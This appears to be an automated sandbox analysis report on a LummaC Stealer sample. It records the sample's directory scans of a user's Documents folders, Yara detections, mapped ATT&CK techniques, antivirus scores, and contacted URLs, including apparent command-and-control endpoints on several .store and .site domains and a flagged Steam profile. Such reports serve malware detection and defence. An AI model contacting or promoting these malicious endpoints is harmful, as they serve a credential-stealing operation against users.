            Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
            Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\DTBZGIOOSOJump to behavior
            Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\DVWHKMNFNNJump to behavior
            Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\HTAGVDFUIEJump to behavior
            Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\NEBFQQYWPSJump to behavior
            Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\NIKHQAIQAUJump to behavior
            Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\NIKHQAIQAUJump to behavior
            Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\ONBQCLYSPUJump to behavior
            Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\ONBQCLYSPUJump to behavior
            Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\QNCYCDFIJJJump to behavior
            Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\SQRKHNBNYNJump to behavior
            Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\UMMBDNEQBNJump to behavior
            Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\WKXEWIOTXIJump to behavior
            Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\XZXHAVGRAGJump to behavior
            Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\DTBZGIOOSOJump to behavior
            Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\DVWHKMNFNNJump to behavior
            Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\HTAGVDFUIEJump to behavior
            Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\JSDNGYCOWYJump to behavior
            Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\NEBFQQYWPSJump to behavior
            Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\QNCYCDFIJJJump to behavior
            Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\SQRKHNBNYNJump to behavior
            Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\UMMBDNEQBNJump to behavior
            Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\XZXHAVGRAGJump to behavior
            Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\DTBZGIOOSOJump to behavior
            Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\DVWHKMNFNNJump to behavior
            Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\HTAGVDFUIEJump to behavior
            Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\JSDNGYCOWYJump to behavior
            Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\NEBFQQYWPSJump to behavior
            Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\NIKHQAIQAUJump to behavior
            Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\ONBQCLYSPUJump to behavior
            Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\SQRKHNBNYNJump to behavior
            Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\WKXEWIOTXIJump to behavior
            Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\XZXHAVGRAGJump to behavior
            Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
            Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\DTBZGIOOSOJump to behavior
            Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\DVWHKMNFNNJump to behavior
            Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\DVWHKMNFNNJump to behavior
            Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\HTAGVDFUIEJump to behavior
            Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\JSDNGYCOWYJump to behavior
            Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\NIKHQAIQAUJump to behavior
            Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\ONBQCLYSPUJump to behavior
            Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\SQRKHNBNYNJump to behavior
            Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\UMMBDNEQBNJump to behavior
            Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
            Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\NEBFQQYWPSJump to behavior
            Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\ONBQCLYSPUJump to behavior
            Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\QNCYCDFIJJJump to behavior
            Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\UMMBDNEQBNJump to behavior
            Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
            Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\DTBZGIOOSOJump to behavior
            Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\DVWHKMNFNNJump to behavior
            Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\HTAGVDFUIEJump to behavior
            Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\JSDNGYCOWYJump to behavior
            Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\NEBFQQYWPSJump to behavior
            Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\NIKHQAIQAUJump to behavior
            Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\ONBQCLYSPUJump to behavior
            Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\QNCYCDFIJJJump to behavior
            Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\SQRKHNBNYNJump to behavior
            Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
            Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\DVWHKMNFNNJump to behavior
            Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\HTAGVDFUIEJump to behavior
            Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\JSDNGYCOWYJump to behavior
            Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\NEBFQQYWPSJump to behavior
            Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\NIKHQAIQAUJump to behavior
            Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\ONBQCLYSPUJump to behavior
            Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\UMMBDNEQBNJump to behavior
            Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\XZXHAVGRAGJump to behavior
            Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
            Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\DTBZGIOOSOJump to behavior
            Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\DVWHKMNFNNJump to behavior
            Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\HTAGVDFUIEJump to behavior
            Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\JSDNGYCOWYJump to behavior
            Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\NEBFQQYWPSJump to behavior
            Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\SQRKHNBNYNJump to behavior
            Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\WKXEWIOTXIJump to behavior
            Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\XZXHAVGRAGJump to behavior
            Source: Yara matchFile source: Process Memory Space: file.exe PID: 7436, type: MEMORYSTR

            Remote Access Functionality

            barindex
            Yara detected LummaC Stealer
            Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: file.exe PID: 7436, type: MEMORYSTR
            Source: Yara matchFile source: sslproxydump.pcap, type: PCAP

            Mitre Att&ck Matrix

            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
            Windows Management Instrumentation            		1
            DLL Side-Loading            		1
            Process Injection            		34
            Virtualization/Sandbox Evasion            		2
            OS Credential Dumping            		751
            Security Software Discovery            		Remote Services41
            Data from Local System            		1
            Encrypted Channel            		Exfiltration Over Other Network MediumAbuse Accessibility Features
            CredentialsDomainsDefault Accounts2
            Command and Scripting Interpreter            		Boot or Logon Initialization Scripts1
            DLL Side-Loading            		1
            Process Injection            		LSASS Memory34
            Virtualization/Sandbox Evasion            		Remote Desktop ProtocolData from Removable Media3
            Ingress Tool Transfer            		Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain Accounts1
            PowerShell            		Logon Script (Windows)Logon Script (Windows)1
            Deobfuscate/Decode Files or Information            		Security Account Manager2
            Process Discovery            		SMB/Windows Admin SharesData from Network Shared Drive4
            Non-Application Layer Protocol            		Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook2
            Obfuscated Files or Information            		NTDS1
            File and Directory Discovery            		Distributed Component Object ModelInput Capture115
            Application Layer Protocol            		Traffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script12
            Software Packing            		LSA Secrets223
            System Information Discovery            		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
            DLL Side-Loading            		Cached Domain CredentialsWi-Fi DiscoveryVNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            SourceDetectionScannerLabelLink
            file.exe44%VirustotalBrowse
            file.exe100%AviraTR/Crypt.TPM.Gen
            file.exe100%Joe Sandbox ML

            Dropped Files

            No Antivirus matches

            Unpacked PE Files

            No Antivirus matches

            Domains

            SourceDetectionScannerLabelLink
            steamcommunity.com0%VirustotalBrowse
            sergei-esenin.com20%VirustotalBrowse
            bathdoomgaz.store22%VirustotalBrowse
            spirittunek.store22%VirustotalBrowse

            URLs

            SourceDetectionScannerLabelLink
            https://duckduckgo.com/chrome_newtab0%URL Reputationsafe
            https://player.vimeo.com0%URL Reputationsafe
            https://duckduckgo.com/ac/?q=0%URL Reputationsafe
            https://store.steampowered.com/subscriber_agreement/0%URL Reputationsafe
            https://www.gstatic.cn/recaptcha/0%URL Reputationsafe
            http://www.valvesoftware.com/legal.htm0%URL Reputationsafe
            https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback0%URL Reputationsafe
            https://steam.tv/0%URL Reputationsafe
            https://steamcommunity.com:443/profiles/76561199724331900100%URL Reputationmalware
            https://store.steampowered.com/points/shop/0%URL Reputationsafe
            https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=0%URL Reputationsafe
            http://crl.rootca1.amazontrust.com/rootca1.crl00%URL Reputationsafe
            https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK20160%URL Reputationsafe
            https://www.ecosia.org/newtab/0%URL Reputationsafe
            https://lv.queniujq.cn0%URL Reputationsafe
            https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br0%URL Reputationsafe
            https://store.steampowered.com/privacy_agreement/0%URL Reputationsafe
            https://checkout.steampowered.com/0%URL Reputationsafe
            https://store.steampowered.com/;0%URL Reputationsafe
            https://store.steampowered.com/about/0%URL Reputationsafe
            https://help.steampowered.com/en/0%URL Reputationsafe
            https://store.steampowered.com/news/0%URL Reputationsafe
            https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=0%URL Reputationsafe
            https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e170%URL Reputationsafe
            https://recaptcha.net/recaptcha/;0%URL Reputationsafe
            https://store.steampowered.com/stats/0%URL Reputationsafe
            https://medal.tv0%URL Reputationsafe
            https://broadcast.st.dl.eccdnx.com0%URL Reputationsafe
            https://store.steampowered.com/steam_refunds/0%URL Reputationsafe
            http://x1.c.lencr.org/00%URL Reputationsafe
            http://x1.i.lencr.org/00%URL Reputationsafe
            https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search0%URL Reputationsafe
            https://login.steampowered.com/0%URL Reputationsafe
            https://support.mozilla.org/products/firefoxgro.all0%URL Reputationsafe

            Domains and IPs

            Contacted Domains

            NameIPActiveMaliciousAntivirus DetectionReputation
            steamcommunity.com
            		104.102.49.254
            		truetrueunknown
            sergei-esenin.com
            		104.21.53.8
            		truetrueunknown
            eaglepawnoy.store
            		unknown
            		unknowntrue
              		unknown
              bathdoomgaz.store
              		unknown
              		unknowntrueunknown
              spirittunek.store
              		unknown
              		unknowntrueunknown
              licendfilteo.site
              		unknown
              		unknowntrue
                		unknown
                studennotediw.store
                		unknown
                		unknowntrue
                  		unknown
                  mobbipenju.store
                  		unknown
                  		unknowntrue
                    		unknown
                    clearancek.site
                    		unknown
                    		unknowntrue
                      		unknown
                      dissapoiznw.store
                      		unknown
                      		unknowntrue
                        		unknown

                        Contacted URLs

                        NameMaliciousAntivirus DetectionReputation
                        studennotediw.storetrue
                          		unknown
                          dissapoiznw.storetrue
                            		unknown
                            https://steamcommunity.com/profiles/76561199724331900true
                              		unknown
                              eaglepawnoy.storetrue
                                		unknown
                                bathdoomgaz.storetrue
                                  		unknown

                                  URLs from Memory and Binaries

                                  NameSourceMaliciousAntivirus DetectionReputation
                                  https://www.cloudflare.com/learning/access-management/phishing-attack/file.exe, 00000000.00000003.1700628151.00000000012D5000.00000004.00000020.00020000.00000000.sdmpfalse
                                    		unknown
                                    https://duckduckgo.com/chrome_newtabfile.exe, 00000000.00000003.1719446245.0000000005BF7000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1719330275.0000000005C0F000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • URL Reputation: safe
                                    		unknown
                                    https://player.vimeo.comfile.exe, 00000000.00000003.1690793016.0000000001295000.00000004.00000020.00020000.00000000.sdmpfalse
                                    • URL Reputation: safe
                                    		unknown
                                    https://store.steampowered.com/;Persistent-AuthWWW-AuthenticateVarysteamCountry=US%7C0e3d185a3e106e7file.exe, 00000000.00000003.1690697919.000000000128B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1690793016.0000000001295000.00000004.00000020.00020000.00000000.sdmpfalse
                                      		unknown
                                      https://duckduckgo.com/ac/?q=file.exe, 00000000.00000003.1719446245.0000000005BF7000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1719330275.0000000005C0F000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • URL Reputation: safe
                                      		unknown
                                      https://community.steamstatic.com/public/javascript/promo/stickers.js?v=W8NP8aTVqtms&amp;l=englishfile.exe, 00000000.00000003.1700607333.00000000012DB000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1690548980.00000000012D1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1700628151.00000000012DB000.00000004.00000020.00020000.00000000.sdmpfalse
                                        		unknown
                                        https://steamcommunity.com/?subsection=broadcastsfile.exe, 00000000.00000003.1700607333.00000000012DB000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1690548980.00000000012D1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1700628151.00000000012DB000.00000004.00000020.00020000.00000000.sdmpfalse
                                          		unknown
                                          https://cosergei-esenin.comsergei-esenin.comty/public/assets/file.exe, 00000000.00000002.1852469176.0000000001281000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1850629516.0000000001271000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1700772120.0000000001283000.00000004.00000020.00020000.00000000.sdmptrue
                                            		unknown
                                            https://community.steamstatic.com/public/shared/css/motiva_sans.css?v=v7XTmVzbLV33&amp;l=englishfile.exe, 00000000.00000003.1700628151.00000000012DB000.00000004.00000020.00020000.00000000.sdmpfalse
                                              		unknown
                                              https://sergei-esenin.com/file.exe, file.exe, 00000000.00000003.1850629516.00000000012DF000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1700772120.000000000128B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1851091044.00000000012DF000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1853087164.00000000012DF000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1700849717.0000000001295000.00000004.00000020.00020000.00000000.sdmptrue
                                                		unknown
                                                https://sergei-esenin.com:443/apiKfile.exe, 00000000.00000002.1852469176.000000000124F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1850629516.000000000124F000.00000004.00000020.00020000.00000000.sdmptrue
                                                  		unknown
                                                  https://community.steamstatic.com/public/css/globalv2.css?v=dQy8Omh4p9PH&amp;l=englishfile.exe, 00000000.00000003.1700607333.00000000012DB000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1690548980.00000000012D1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1700628151.00000000012DB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    		unknown
                                                    https://store.steampowered.com/subscriber_agreement/file.exe, 00000000.00000003.1700607333.00000000012DB000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1690548980.00000000012D1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1700628151.00000000012DB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    • URL Reputation: safe
                                                    		unknown
                                                    https://www.gstatic.cn/recaptcha/file.exe, 00000000.00000003.1700772120.0000000001283000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    • URL Reputation: safe
                                                    		unknown
                                                    http://www.valvesoftware.com/legal.htmfile.exe, 00000000.00000003.1700607333.00000000012DB000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1690548980.00000000012D1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1700628151.00000000012DB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    • URL Reputation: safe
                                                    		unknown
                                                    https://www.youtube.comfile.exe, 00000000.00000003.1690793016.0000000001295000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      		unknown
                                                      https://www.google.comfile.exe, 00000000.00000003.1690793016.0000000001295000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        		unknown
                                                        https://sergei-esenin.com:443/apihfile.exe, 00000000.00000003.1700659896.000000000124F000.00000004.00000020.00020000.00000000.sdmptrue
                                                          		unknown
                                                          https://community.steamstatic.com/public/shared/javascript/tooltip.js?v=.zYHOpI1L3Rt0file.exe, 00000000.00000003.1700607333.00000000012DB000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1690548980.00000000012D1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1700628151.00000000012DB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            		unknown
                                                            https://sergei-esenin.com/za%file.exe, 00000000.00000003.1700772120.000000000128B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1700849717.0000000001295000.00000004.00000020.00020000.00000000.sdmptrue
                                                              		unknown
                                                              https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedbackfile.exe, 00000000.00000003.1700607333.00000000012DB000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1690548980.00000000012D1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1700628151.00000000012DB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              • URL Reputation: safe
                                                              		unknown
                                                              https://community.steamstatic.com/public/css/skin_1/modalContent.css?v=.VpiwkLAYt9r1file.exe, 00000000.00000003.1700607333.00000000012DB000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1690548980.00000000012D1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1700628151.00000000012DB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                		unknown
                                                                https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/file.exe, 00000000.00000003.1690697919.000000000128B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  		unknown
                                                                  https://s.ytimg.com;file.exe, 00000000.00000003.1700772120.0000000001283000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    		unknown
                                                                    https://sergei-esenin.com/BKfile.exe, 00000000.00000003.1850629516.00000000012DF000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1851091044.00000000012DF000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1853087164.00000000012DF000.00000004.00000020.00020000.00000000.sdmptrue
                                                                      		unknown
                                                                      https://steam.tv/file.exe, 00000000.00000003.1700772120.0000000001283000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      • URL Reputation: safe
                                                                      		unknown
                                                                      https://community.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016file.exe, 00000000.00000003.1700607333.00000000012DB000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1690548980.00000000012D1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1700628151.00000000012DB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        		unknown
                                                                        https://licendfilteo.site:443/apifile.exe, 00000000.00000003.1690568055.000000000124F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1700659896.000000000124F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          		unknown
                                                                          https://steamcommunity.com/pfile.exe, 00000000.00000003.1690548980.00000000012D1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            		unknown
                                                                            https://community.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=.isFTSRckeNhCfile.exe, 00000000.00000003.1700607333.00000000012DB000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1690548980.00000000012D1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1700628151.00000000012DB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              		unknown
                                                                              https://sergei-esenin.com/apiePfile.exe, 00000000.00000003.1851345687.0000000005BDD000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.1858209085.0000000005BDD000.00000004.00000800.00020000.00000000.sdmptrue
                                                                                		unknown
                                                                                https://community.steamstatic.com/public/css/skin_1/profilev2.css?v=t9xiI4DlPpEB&amp;l=englishfile.exe, 00000000.00000003.1700607333.00000000012DB000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1690548980.00000000012D1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1700628151.00000000012DB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  		unknown
                                                                                  https://steamcommunity.com:443/profiles/76561199724331900file.exe, 00000000.00000002.1852469176.000000000124F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1850629516.000000000124F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1690568055.000000000124F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1700659896.000000000124F000.00000004.00000020.00020000.00000000.sdmptrue
                                                                                  • URL Reputation: malware
                                                                                  		unknown
                                                                                  https://store.steampowered.com/points/shop/file.exe, 00000000.00000003.1700607333.00000000012DB000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1690548980.00000000012D1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1700628151.00000000012DB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  • URL Reputation: safe
                                                                                  		unknown
                                                                                  https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=file.exe, 00000000.00000003.1719446245.0000000005BF7000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1719330275.0000000005C0F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  • URL Reputation: safe
                                                                                  		unknown
                                                                                  http://crl.rootca1.amazontrust.com/rootca1.crl0file.exe, 00000000.00000003.1752865199.0000000005CDD000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  • URL Reputation: safe
                                                                                  		unknown
                                                                                  https://community.steamstatic.com/public/javascript/applications/community/main.js?v=4XouecKy8sZy&amfile.exe, 00000000.00000003.1690568055.0000000001248000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1700607333.00000000012DB000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1690548980.00000000012D1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1700628151.00000000012DB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    		unknown
                                                                                    http://ocsp.rootca1.amazontrust.com0:file.exe, 00000000.00000003.1752865199.0000000005CDD000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      		unknown
                                                                                      https://clearancek.site/apifile.exe, file.exe, 00000000.00000003.1690568055.0000000001263000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1852469176.0000000001263000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1850629516.0000000001263000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1700772120.0000000001265000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1690697919.0000000001265000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1700659896.0000000001263000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                        		unknown
                                                                                        https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016file.exe, 00000000.00000003.1718877156.0000000005C3C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        • URL Reputation: safe
                                                                                        		unknown
                                                                                        https://sketchfab.comfile.exe, 00000000.00000003.1690793016.0000000001295000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                          		unknown
                                                                                          https://www.ecosia.org/newtab/file.exe, 00000000.00000003.1719446245.0000000005BF7000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1719628135.0000000005BF9000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1719330275.0000000005C0F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          • URL Reputation: safe
                                                                                          		unknown
                                                                                          https://lv.queniujq.cnfile.exe, 00000000.00000003.1690793016.0000000001295000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                          • URL Reputation: safe
                                                                                          		unknown
                                                                                          https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-brfile.exe, 00000000.00000003.1754118021.0000000005EF1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          • URL Reputation: safe
                                                                                          		unknown
                                                                                          https://www.youtube.com/file.exe, 00000000.00000003.1700772120.0000000001283000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                            		unknown
                                                                                            https://steamcommunity.com/Ufile.exe, 00000000.00000003.1690568055.000000000124F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                              		unknown
                                                                                              https://community.steamstatic.com/public/shared/css/shared_global.css?v=uF6G1wyNU-4c&amp;l=englishfile.exe, 00000000.00000003.1700607333.00000000012DB000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1690548980.00000000012D1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1700628151.00000000012DB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                		unknown
                                                                                                https://community.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.pngfile.exe, 00000000.00000003.1700607333.00000000012DB000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1690548980.00000000012D1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1700628151.00000000012DB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                  		unknown
